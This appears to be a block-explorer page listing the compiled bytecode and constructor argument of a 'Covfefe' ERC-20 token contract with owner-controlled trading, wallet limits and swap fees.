60405162461bcd60e51b81526004016105ae906117c2565b6001600160a01b03919091166000908152600760205260409020805460ff1916911515919091179055565b6000546001600160a01b0316331461064b5760405162461bcd60e51b81526004016105ae906117c2565b6106556000610a0d565b565b6000601354600454610506610485565b6000601354600254610506610485565b600061047b33848461087e565b6000546001600160a01b031633146106ae5760405162461bcd60e51b81526004016105ae906117c2565b601a55565b6000546001600160a01b031633146106dd5760405162461bcd60e51b81526004016105ae906117c2565b6001600160a01b0381166107425760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105ae565b61074b81610a0d565b50565b6001600160a01b0383166107b05760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105ae565b6001600160a01b0382166108115760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016105ae565b6001600160a01b0383811660008181526006602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061057d82846117f7565b610889838383610a5d565b6108938383610c0c565b61089e838383610ca1565b6108a88383610d92565b6108b3838383610de9565b6108bc83610ed8565b6108c7838383610f7c565b6019546001600160a01b0384166000908152600560205260409020546108ed9083610872565b6001600160a01b03808616600081815260056020526040902092909255841614158061091e575061091e8484610fa1565b61092d5780601a819055610950565b6109378484610fa1565b610941578161094c565b61094c848484610fe7565b9050805b506001600160a01b03831660009081526005602052604090205461097490826110db565b6001600160a01b03808516600081815260056020908152604080832095909555600990528390204390559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109d39085815260200190565b60405180910390a350505050565b60008184841115610a055760405162461bcd60e51b81526004016105ae9190611601565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038316610ac15760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016105ae565b6001600160a01b038216610b235760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016105ae565b60008111610b855760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016105ae565b6001600160a01b038316600090815260056020526040902054811115610c075760405162461bcd60e51b815260206004820152603160248201527f596f752061726520747279696e6720746f207472616e73666572206d6f7265206044820152707468616e20796f75722062616c616e636560781b60648201526084016105ae565b505050565b6001600160a01b03821660009081526007602052604090205460ff16158015610c4e57506001600160a01b03811660009081526007602052604090205460ff16155b15610c9d57600b54600160a01b900460ff16610c9d5760405162461bcd60e51b815260206004820152600e60248201526d1d1c98591a5b99d05b1b1bddd95960921b60448201526064016105ae565b5050565b6001600160a01b03831660009081526007602052604090205460ff16158015610ce357506001600160a01b03821660009081526007602052604090205460ff16155b8015610cfd5750600b546001600160a01b03838116911614155b8015610d1457506001600160a01b03821661dead14155b15610c0757610d21610657565b6001600160a01b038316600090815260056020526040902054610d4490836110db565b1115610c075760405162461bcd60e51b815260206004820152601e60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e742e000060448201526064016105ae565b600b546001600160a01b038281169116148015610dc857506001600160a01b03821660009081526007602052604090205460ff16155b15610c9d57600160156000828254610de0919061180a565b90915550505050565b600b546001600160a01b03848116911614610e6b57610e066104f6565b81111580610e2c57506001600160a01b03831660009081526007602052604090205460ff165b80610e4f57506001600160a01b03821660009081526007602052604090205460ff165b610e6b5760405162461bcd60e51b81526004016105ae9061181d565b610e73610667565b81111580610e9957506001600160a01b03831660009081526007602052604090205460ff165b80610ebc57506001600160a01b03821660009081526007602052604090205460ff165b610c075760405162461bcd60e51b81526004016105ae9061181d565b6001600160a01b03811660009081526007602052604090205460ff16158015610f0f5750600b546001600160a01b03828116911614155b8015610f3257506001600160a01b03811660009081526009602052604090205415155b1561074b57601a546001600160a01b0382166000908152600960205260409020544391610f5e9161180a565b111561074b5760405162461bcd60e51b81526004016105ae9061181d565b610f878383836110e7565b15610c0757610f97601754611199565b6000601555505050565b6001600160a01b03821660009081526007602052604081205460ff1615801561057d5750506001600160a01b031660009081526007602052604090205460ff1615919050565b600080610ff4858561132a565b11156110d457600061101d611009868661132a565b6013546110179086906113cb565b906113d7565b3060009081526005602052604090205490915061103a90826110db565b30600081815260056020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061108b9085815260200190565b60405180910390a3600f54156110c2576110c23061dead6110bd600f54611017601354896113cb90919063ffffffff16565b61087e565b6110cc8382610872565b91505061057d565b5092915050565b600061057d828461180a565b6018546017543060009081526005602052604081205460165491938510159211159060ff1615801561111b575060145460ff165b80156111305750600b54600160a01b900460ff165b80156111395750815b801561115e57506001600160a01b03861660009081526007602052604090205460ff16155b80156111775750600b546001600160a01b038681169116145b80156111865750600160155410155b801561118f5750805b9695505050505050565b6016805460ff19166001908117909155600e54600d54600c546000936111d3936002936110179391926111cd9283916110db565b906110db565b905060006111f6826111f0600c54866113d790919063ffffffff16565b906113cb565b905060006112048483610872565b905047611210826113e3565b600061121c4783610872565b9050600061123f611238600c548861087290919063ffffffff16565b83906113cb565b90506000611258600c54836113d790919063ffffffff16565b9050801561126a5761126a868261153d565b600d5460009061127f906110178560026113d7565b905080156112ca576040517310c4f0e84d6e2e884a1c184830051d83deba83519082156108fc029083906000818181858888f193505050501580156112c8573d6000803e3d6000fd5b505b4780156113145760405173061eac761e94cc5bd381e67a0e7fecd6b8e2b8d09082156108fc029083906000818181858888f19350505050158015611312573d6000803e3d6000fd5b505b50506016805460ff191690555050505050505050565b6001600160a01b03821660009081526008602052604081205460ff168061136957506001600160a01b03821660009081526008602052604090205460ff165b156113835760135461137c906064610872565b905061047f565b600b546001600160a01b03908116908316036113a2575060115461047f565b600b546001600160a01b03908116908416036113c1575060105461047f565b5060125492915050565b600061057d82846117a0565b600061057d8284611789565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061141857611418611848565b6001600160a01b03928316602091820292909201810191909152600a54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611471573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611495919061185e565b816001815181106114a8576114a8611848565b6001600160a01b039283166020918202929092010152600a546114ce913091168461074e565b600a5460405163791ac94760e01b81526001600160a01b039091169063791ac9479061150790859060009086903090429060040161187b565b600060405180830381600087803b15801561152157600080fd5b505af1158015611535573d6000803e3d6000fd5b505050505050565b600a546115559030906001600160a01b03168461074e565b600a5460405163f305d71960e01b81523060048201526024810184905260006044820181905260648201527310c4f0e84d6e2e884a1c184830051d83deba835160848201524260a48201526001600160a01b039091169063f305d71990839060c40160606040518083038185885af11580156115d5573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906115fa91906118ec565b5050505050565b600060208083528351808285015260005b8181101561162e57858101830151858201604001528201611612565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461074b57600080fd5b6000806040838503121561167757600080fd5b82356116828161164f565b946020939093013593505050565b6000806000606084860312156116a557600080fd5b83356116b08161164f565b925060208401356116c08161164f565b929592945050506040919091013590565b6000602082840312156116e357600080fd5b813561057d8161164f565b6000806040838503121561170157600080fd5b823561170c8161164f565b91506020830135801515811461172157600080fd5b809150509250929050565b60006020828403121561173e57600080fd5b5035919050565b6000806040838503121561175857600080fd5b82356117638161164f565b915060208301356117218161164f565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761047f5761047f611773565b6000826117bd57634e487b7160e01b600052601260045260246000fd5b500490565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b8181038181111561047f5761047f611773565b8082018082111561047f5761047f611773565b602080825260119082015270151608131a5b5a5d08115e18d959591959607a1b604082015260600190565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561187057600080fd5b815161057d8161164f565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156118cb5784516001600160a01b0316835293830193918301916001016118a6565b50506001600160a01b03969096166060850152505050608001529392505050565b60008060006060848603121561190157600080fd5b835192506020840151915060408401519050925092509256fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220157b3650c15a73aa556dd1c8c1a33c1e6b873e8c9198f38e2778c7495bcc026164736f6c63430008130033000000000000000000000000d9e1ce17f2641f24ae83637ab66a2cca9c378b9f

Deployed Bytecode

0x6080604052600436106101395760003560e01c806378109e54116100ab578063a8aa1b311161006f578063a8aa1b311461037b578063a9059cbb1461039b578063aca62ba9146103bb578063c1adf7bc146103db578063dd62ed3e14610408578063f2fde38b1461044e57600080fd5b806378109e54146102dd5780637d1db4a5146102f25780638da5cb5b146103075780638dad03e01461033957806395d89b411461034f57600080fd5b8063293230b8116100fd578063293230b81461020f578063313ce567146102265780633f4218e01461024257806348ff2b8b1461027257806370a0823114610292578063715018a6146102c857600080fd5b806306fdde0314610145578063095ea7b31461018757806318160ddd146101b75780631f976b7e146101da57806323b872dd146101ef57600080fd5b3661014057005b600080fd5b34801561015157600080fd5b50604080518082019091526007815266436f766665666560c81b60208201525b60405161017e9190611601565b60405180910390f35b34801561019357600080fd5b506101a76101a2366004611664565b61046e565b604051901515815260200161017e565b3480156101c357600080fd5b506101cc610485565b60405190815260200161017e565b3480156101e657600080fd5b506101cc6104f6565b3480156101fb57600080fd5b506101a761020a366004611690565b61051a565b34801561021b57600080fd5b50610224610584565b005b34801561023257600080fd5b506040516009815260200161017e565b34801561024e57600080fd5b506101a761025d3660046116d1565b60076020526000908152604090205460ff1681565b34801561027e57600080fd5b5061022461028d3660046116ee565b6105cc565b34801561029e57600080fd5b506101cc6102ad3660046116d1565b6001600160a01b031660009081526005602052604090205490565b3480156102d457600080fd5b50610224610621565b3480156102e957600080fd5b506101cc610657565b3480156102fe57600080fd5b506101cc610667565b34801561031357600080fd5b506000546001600160a01b03165b6040516001600160a01b03909116815260200161017e565b34801561034557600080fd5b506101cc601a5481565b34801561035b57600080fd5b5060408051808201909152600381526221a32360e91b6020820152610171565b34801561038757600080fd5b50600b54610321906001600160a01b031681565b3480156103a757600080fd5b506101a76103b6366004611664565b610677565b3480156103c757600080fd5b506102246103d636600461172c565b610684565b3480156103e757600080fd5b506101cc6103f63660046116d1565b60096020526000908152604090205481565b34801561041457600080fd5b506101cc610423366004611745565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b34801561045a57600080fd5b506102246104693660046116d1565b6106b3565b600061047b33848461074e565b5060015b92915050565b60056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5461dead60009081527f7d509c07f0d4edcc2dd1b53aae68677132eb562dcba78e36381b63ccaf66e6ba5460015491926104f19290916104eb9190610872565b90610872565b905090565b6000601354600354610506610485565b6105109190611789565b6104f191906117a0565b600061052784848461087e565b61057984336105748560405180606001604052806028815260200161191b602891396001600160a01b038a16600090815260066020908152604080832033845290915290205491906109e1565b61074e565b5060015b9392505050565b6000546001600160a01b031633146105b75760405162461bcd60e51b81526004016105ae906117c2565b60405180910390fd5b600b805460ff60a01b1916600160a01b179055565b6000546001600160a01b031633146105f65760405162461bcd60e51b81526004016105ae906117c2565b6001600160a01b03919091166000908152600760205260409020805460ff1916911515919091179055565b6000546001600160a01b0316331461064b5760405162461bcd60e51b81526004016105ae906117c2565b6106556000610a0d565b565b6000601354600454610506610485565b6000601354600254610506610485565b600061047b33848461087e565b6000546001600160a01b031633146106ae5760405162461bcd60e51b81526004016105ae906117c2565b601a55565b6000546001600160a01b031633146106dd5760405162461bcd60e51b81526004016105ae906117c2565b6001600160a01b0381166107425760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105ae565b61074b81610a0d565b50565b6001600160a01b0383166107b05760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105ae565b6001600160a01b0382166108115760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016105ae565b6001600160a01b0383811660008181526006602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061057d82846117f7565b610889838383610a5d565b6108938383610c0c565b61089e838383610ca1565b6108a88383610d92565b6108b3838383610de9565b6108bc83610ed8565b6108c7838383610f7c565b6019546001600160a01b0384166000908152600560205260409020546108ed9083610872565b6001600160a01b03808616600081815260056020526040902092909255841614158061091e575061091e8484610fa1565b61092d5780601a819055610950565b6109378484610fa1565b610941578161094c565b61094c848484610fe7565b9050805b506001600160a01b03831660009081526005602052604090205461097490826110db565b6001600160a01b03808516600081815260056020908152604080832095909555600990528390204390559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109d39085815260200190565b60405180910390a350505050565b60008184841115610a055760405162461bcd60e51b81526004016105ae9190611601565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038316610ac15760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016105ae565b6001600160a01b038216610b235760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016105ae565b60008111610b855760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016105ae565b6001600160a01b038316600090815260056020526040902054811115610c075760405162461bcd60e51b815260206004820152603160248201527f596f752061726520747279696e6720746f207472616e73666572206d6f7265206044820152707468616e20796f75722062616c616e636560781b60648201526084016105ae565b505050565b6001600160a01b03821660009081526007602052604090205460ff16158015610c4e57506001600160a01b03811660009081526007602052604090205460ff16155b15610c9d57600b54600160a01b900460ff16610c9d5760405162461bcd60e51b815260206004820152600e60248201526d1d1c98591a5b99d05b1b1bddd95960921b60448201526064016105ae565b5050565b6001600160a01b03831660009081526007602052604090205460ff16158015610ce357506001600160a01b03821660009081526007602052604090205460ff16155b8015610cfd5750600b546001600160a01b03838116911614155b8015610d1457506001600160a01b03821661dead14155b15610c0757610d21610657565b6001600160a01b038316600090815260056020526040902054610d4490836110db565b1115610c075760405162461bcd60e51b815260206004820152601e60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e742e000060448201526064016105ae565b600b546001600160a01b038281169116148015610dc857506001600160a01b03821660009081526007602052604090205460ff16155b15610c9d57600160156000828254610de0919061180a565b90915550505050565b600b546001600160a01b03848116911614610e6b57610e066104f6565b81111580610e2c57506001600160a01b03831660009081526007602052604090205460ff165b80610e4f57506001600160a01b03821660009081526007602052604090205460ff165b610e6b5760405162461bcd60e51b81526004016105ae9061181d565b610e73610667565b81111580610e9957506001600160a01b03831660009081526007602052604090205460ff165b80610ebc57506001600160a01b03821660009081526007602052604090205460ff165b610c075760405162461bcd60e51b81526004016105ae9061181d565b6001600160a01b03811660009081526007602052604090205460ff16158015610f0f5750600b546001600160a01b03828116911614155b8015610f3257506001600160a01b03811660009081526009602052604090205415155b1561074b57601a546001600160a01b0382166000908152600960205260409020544391610f5e9161180a565b111561074b5760405162461bcd60e51b81526004016105ae9061181d565b610f878383836110e7565b15610c0757610f97601754611199565b6000601555505050565b6001600160a01b03821660009081526007602052604081205460ff1615801561057d5750506001600160a01b031660009081526007602052604090205460ff1615919050565b600080610ff4858561132a565b11156110d457600061101d611009868661132a565b6013546110179086906113cb565b906113d7565b3060009081526005602052604090205490915061103a90826110db565b30600081815260056020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061108b9085815260200190565b60405180910390a3600f54156110c2576110c23061dead6110bd600f54611017601354896113cb90919063ffffffff16565b61087e565b6110cc8382610872565b91505061057d565b5092915050565b600061057d828461180a565b6018546017543060009081526005602052604081205460165491938510159211159060ff1615801561111b575060145460ff165b80156111305750600b54600160a01b900460ff165b80156111395750815b801561115e57506001600160a01b03861660009081526007602052604090205460ff16155b80156111775750600b546001600160a01b038681169116145b80156111865750600160155410155b801561118f5750805b9695505050505050565b6016805460ff19166001908117909155600e54600d54600c546000936111d3936002936110179391926111cd9283916110db565b906110db565b905060006111f6826111f0600c54866113d790919063ffffffff16565b906113cb565b905060006112048483610872565b905047611210826113e3565b600061121c4783610872565b9050600061123f611238600c548861087290919063ffffffff16565b83906113cb565b90506000611258600c54836113d790919063ffffffff16565b9050801561126a5761126a868261153d565b600d5460009061127f906110178560026113d7565b905080156112ca576040517310c4f0e84d6e2e884a1c184830051d83deba83519082156108fc029083906000818181858888f193505050501580156112c8573d6000803e3d6000fd5b505b4780156113145760405173061eac761e94cc5bd381e67a0e7fecd6b8e2b8d09082156108fc029083906000818181858888f19350505050158015611312573d6000803e3d6000fd5b505b50506016805460ff191690555050505050505050565b6001600160a01b03821660009081526008602052604081205460ff168061136957506001600160a01b03821660009081526008602052604090205460ff165b156113835760135461137c906064610872565b905061047f565b600b546001600160a01b03908116908316036113a2575060115461047f565b600b546001600160a01b03908116908416036113c1575060105461047f565b5060125492915050565b600061057d82846117a0565b600061057d8284611789565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061141857611418611848565b6001600160a01b03928316602091820292909201810191909152600a54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611471573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611495919061185e565b816001815181106114a8576114a8611848565b6001600160a01b039283166020918202929092010152600a546114ce913091168461074e565b600a5460405163791ac94760e01b81526001600160a01b039091169063791ac9479061150790859060009086903090429060040161187b565b600060405180830381600087803b15801561152157600080fd5b505af1158015611535573d6000803e3d6000fd5b505050505050565b600a546115559030906001600160a01b03168461074e565b600a5460405163f305d71960e01b81523060048201526024810184905260006044820181905260648201527310c4f0e84d6e2e884a1c184830051d83deba835160848201524260a48201526001600160a01b039091169063f305d71990839060c40160606040518083038185885af11580156115d5573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906115fa91906118ec565b5050505050565b600060208083528351808285015260005b8181101561162e57858101830151858201604001528201611612565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461074b57600080fd5b6000806040838503121561167757600080fd5b82356116828161164f565b946020939093013593505050565b6000806000606084860312156116a557600080fd5b83356116b08161164f565b925060208401356116c08161164f565b929592945050506040919091013590565b6000602082840312156116e357600080fd5b813561057d8161164f565b6000806040838503121561170157600080fd5b823561170c8161164f565b91506020830135801515811461172157600080fd5b809150509250929050565b60006020828403121561173e57600080fd5b5035919050565b6000806040838503121561175857600080fd5b82356117638161164f565b915060208301356117218161164f565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761047f5761047f611773565b6000826117bd57634e487b7160e01b600052601260045260246000fd5b500490565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b8181038181111561047f5761047f611773565b8082018082111561047f5761047f611773565b602080825260119082015270151608131a5b5a5d08115e18d959591959607a1b604082015260600190565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561187057600080fd5b815161057d8161164f565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156118cb5784516001600160a01b0316835293830193918301916001016118a6565b50506001600160a01b03969096166060850152505050608001529392505050565b60008060006060848603121561190157600080fd5b835192506020840151915060408401519050925092509256fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220157b3650c15a73aa556dd1c8c1a33c1e6b873e8c9198f38e2778c7495bcc026164736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000d9e1ce17f2641f24ae83637ab66a2cca9c378b9f

-----Decoded View---------------
Arg [0] : dex (address): 0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000d9e1ce17f2641f24ae83637ab66a2cca9c378b9f


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.